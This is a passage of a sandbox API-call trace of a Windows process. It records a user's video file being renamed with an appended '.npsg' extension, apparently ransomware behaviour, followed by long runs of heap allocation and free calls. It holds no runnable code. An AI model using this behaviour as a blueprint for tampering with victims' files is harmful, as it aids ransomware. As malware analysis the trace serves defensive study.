(lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\kYk5K01VVlQpw\\oMoJTci\\xVzUBH__T XnwETm.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\kyk5k01vvlqpw\\omojtci\\xvzubh__t xnwetm.mp4"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\kYk5K01VVlQpw\\oMoJTci\\xVzUBH__T XnwETm.mp4.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\kyk5k01vvlqpw\\omojtci\\xvzubh__t xnwetm.mp4.npsg")) returned 1 [0239.715] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89cd0 | out: hHeap=0x620000) returned 1 [0239.715] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0239.715] VirtualFree (lpAddress=0x39f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0239.716] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a87c0 | out: hHeap=0x620000) returned 1 [0239.716] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd330e430, ftCreationTime.dwHighDateTime=0x1d5b749, ftLastAccessTime.dwLowDateTime=0xc2193d30, ftLastAccessTime.dwHighDateTime=0x1d5c358, ftLastWriteTime.dwLowDateTime=0xc2193d30, ftLastWriteTime.dwHighDateTime=0x1d5c358, nFileSizeHigh=0x0, nFileSizeLow=0x9d45, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="xVzUBH__T XnwETm.mp4", cAlternateFileName="XVZUBH~1.MP4")) returned 0 [0239.716] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0239.716] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c18b0 | out: hHeap=0x620000) returned 1 [0239.716] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a6e8 | out: hHeap=0x620000) returned 1 [0239.717] PeekMessageW (in: lpMsg=0x39aff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39aff08) returned 0 [0239.717] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c45a0 | out: hHeap=0x620000) returned 1 [0239.717] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a2a8 | out: hHeap=0x620000) returned 1 [0239.717] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c44b0 | out: hHeap=0x620000) returned 1 [0239.717] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a4c8 | out: hHeap=0x620000) returned 1 [0239.717] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a330 | out: hHeap=0x620000) returned 1 [0239.717] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a3b8 | out: hHeap=0x620000) returned 1 [0239.717] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e5f8 | out: hHeap=0x620000) returned 1 [0239.717] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e858 | out: hHeap=0x620000) returned 1 [0239.717] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e7c0 | out: hHeap=0x620000) returned 1 [0239.717] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8d7c0 | out: hHeap=0x620000) returned 1 [0239.717] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8fa18 | out: hHeap=0x620000) returned 1 [0239.717] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a198 | out: hHeap=0x620000) returned 1 [0239.717] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a000 | out: hHeap=0x620000) returned 1 [0239.717] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a110 | out: hHeap=0x620000) returned 1 [0239.717] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90810 | out: hHeap=0x620000) returned 1 [0239.717] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a110 [0239.717] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0239.717] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a000 [0239.717] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0239.717] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.717] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a000 | out: hHeap=0x620000) returned 1 [0239.717] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a000 [0239.718] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0239.718] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.718] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a000 | out: hHeap=0x620000) returned 1 [0239.718] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a000 [0239.718] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0239.718] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.718] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a000 | out: hHeap=0x620000) returned 1 [0239.718] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a000 [0239.718] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0239.718] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.718] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a000 | out: hHeap=0x620000) returned 1 [0239.718] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a000 [0239.718] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0239.718] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.718] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a000 | out: hHeap=0x620000) returned 1 [0239.718] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a000 [0239.718] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0239.718] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.718] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a000 | out: hHeap=0x620000) returned 1 [0239.718] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a000 [0239.718] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0239.718] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x3b78058 [0239.718] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.718] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0239.718] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a000 | out: hHeap=0x620000) returned 1 [0239.719] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a000 [0239.719] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0239.719] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.719] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a000 | out: hHeap=0x620000) returned 1 [0239.719] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a000 [0239.719] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0239.719] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.719] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a000 | out: hHeap=0x620000) returned 1 [0239.719] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a000 [0239.719] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0239.719] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0239.719] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a000 | out: hHeap=0x620000) returned 1 [0239.719] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a000 [0239.719] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0239.719] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0239.719] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a000 | out: hHeap=0x620000) returned 1 [0239.719] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a000 [0239.719] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0239.719] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.719] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a000 | out: hHeap=0x620000) returned 1 [0239.719] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a000 [0239.719] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0239.719] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.719] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a000 | out: hHeap=0x620000) returned 1 [0239.719] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a000 [0239.720] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0239.720] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.720] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a000 | out: hHeap=0x620000) returned 1 [0239.720] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a000 [0239.720] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0239.720] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.720] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a000 | out: hHeap=0x620000) returned 1 [0239.720] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a000 [0239.720] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0239.720] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.720] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a000 | out: hHeap=0x620000) returned 1 [0239.720] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a000 [0239.720] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0239.720] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.720] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a000 | out: hHeap=0x620000) returned 1 [0239.720] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a000 [0239.720] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0239.720] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.720] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a000 | out: hHeap=0x620000) returned 1 [0239.720] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a000 [0239.720] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0239.720] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.720] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a000 | out: hHeap=0x620000) returned 1 [0239.720] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a000 [0239.721] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0239.721] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.721] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a000 | out: hHeap=0x620000) returned 1 [0239.721] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a000 [0239.721] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0239.721] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.721] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a000 | out: hHeap=0x620000) returned 1 [0239.721] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a000 [0239.721] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0239.721] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.721] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a000 | out: hHeap=0x620000) returned 1 [0239.721] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a000 [0239.721] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0239.721] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0239.721] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.721] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0239.721] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a000 | out: hHeap=0x620000) returned 1 [0239.721] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a000 [0239.721] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0239.721] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.721] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a000 | out: hHeap=0x620000) returned 1 [0239.721] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a000 [0239.721] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0239.721] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x3b78058 [0239.722] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.722] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0239.722] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a000 | out: hHeap=0x620000) returned 1 [0239.722] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a000 [0239.722] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0239.722] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0239.722] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a000 | out: hHeap=0x620000) returned 1 [0239.722] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a000 [0239.722] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0239.722] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0239.722] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a000 | out: hHeap=0x620000) returned 1 [0239.722] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a000 [0239.722] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0239.722] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.722] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a000 | out: hHeap=0x620000) returned 1 [0239.722] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a000 [0239.722] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0239.722] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.722] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a000 | out: hHeap=0x620000) returned 1 [0239.722] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a000 [0239.722] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0239.722] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0239.722] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.723] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0239.723] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a000 | out: hHeap=0x620000) returned 1 [0239.723] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a000 [0239.723] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0239.723] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.723] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a000 | out: hHeap=0x620000) returned 1 [0239.723] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a000 [0239.723] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0239.723] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.723] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a000 | out: hHeap=0x620000) returned 1 [0239.723] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a000 [0239.723] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0239.723] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.723] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a000 | out: hHeap=0x620000) returned 1 [0239.723] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a000 [0239.723] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0239.723] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.723] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a000 | out: hHeap=0x620000) returned 1 [0239.723] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a000 [0239.723] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0239.723] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.723] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a000 | out: hHeap=0x620000) returned 1 [0239.723] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a000 [0239.724] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0239.724] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.724] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a000 | out: hHeap=0x620000) returned 1 [0239.724] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a000 [0239.724] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0239.724] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.724] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a000 | out: hHeap=0x620000) returned 1 [0239.724] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a000 [0239.724] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0239.724] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.724] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a000 | out: hHeap=0x620000) returned 1 [0239.724] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a000 [0239.724] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0239.724] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.724] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a000 | out: hHeap=0x620000) returned 1 [0239.724] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a000 [0239.724] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0239.724] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0239.724] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.724] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0239.724] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a000 | out: hHeap=0x620000) returned 1 [0239.724] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a000 [0239.724] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0239.725] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.725] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a000 | out: hHeap=0x620000) returned 1 [0239.725] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a000 [0239.725] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0239.725] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0239.725] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a000 | out: hHeap=0x620000) returned 1 [0239.725] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a000 [0239.725] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0239.725] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0239.725] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a000 | out: hHeap=0x620000) returned 1 [0239.725] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a000 [0239.725] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0239.725] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.725] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a000 | out: hHeap=0x620000) returned 1 [0239.725] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a000 [0239.725] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0239.725] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.725] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a000 | out: hHeap=0x620000) returned 1 [0239.725] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a000 [0239.725] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0239.725] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0239.725] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.725] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0239.725] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a000 | out: hHeap=0x620000) returned 1 [0239.725] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a000 [0239.726] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0239.726] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.726] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a000 | out: hHeap=0x620000) returned 1 [0239.726] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a000 [0239.726] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0239.726] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.726] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a000 | out: hHeap=0x620000) returned 1 [0239.726] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a000 [0239.726] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0239.726] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.726] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a000 | out: hHeap=0x620000) returned 1 [0239.726] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a000 [0239.726] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0239.726] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.726] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a000 | out: hHeap=0x620000) returned 1 [0239.726] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a000 [0239.726] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0239.726] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.726] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a000 | out: hHeap=0x620000) returned 1 [0239.726] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a000 [0239.726] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0239.726] HeapFree (in: hHeap=0x620000, 